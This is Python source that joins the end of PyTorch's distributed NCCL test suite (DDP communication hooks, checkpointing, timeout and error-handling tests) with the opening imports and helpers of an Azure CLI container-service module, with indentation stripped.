new_params = list(gpu_model.parameters())
# Run plain model with allreduce hook and separate optimizer step.
# Verify gradients are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
sgd = _SUPPORTED_OPTIM_MAPPING.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reprodce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expect when layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkponted twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (ex: files for FileStore before going down)
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are idential to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import random
import re
import shutil
import ssl
import stat
import string
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
# pylint: disable=import-error
import yaml
import dateutil.parser
from dateutil.relativedelta import relativedelta
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from msrestazure.azure_exceptions import CloudError
import requests
# pylint: disable=no-name-in-module,import-error
from azure.cli.command_modules.acs import acs_client, proxy
from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod
from azure.cli.core.api import get_config_dir
from azure.cli.core._profile import Profile
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
ApplicationUpdateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters,
ResourceAccess, RequiredResourceAccess)
from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceNetworkProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceLinuxProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshConfiguration
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceSshPublicKey
from azure.mgmt.containerservice.v2020_03_01.models import ContainerServiceStorageProfileTypes
from azure.mgmt.containerservice.v2020_03_01.models import ManagedCluster
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAADProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAddonProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterIdentity
from azure.mgmt.containerservice.v2020_03_01.models import AgentPool
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterSKU
from azure.mgmt.containerservice.v2020_03_01.models import ManagedClusterWindowsProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile
from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile
from ._client_factory import cf_container_services
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type,
_parse_comma_separated_list)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
logger = get_logger(__name__)
# pylint:disable=too-many-lines,unused-argument
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
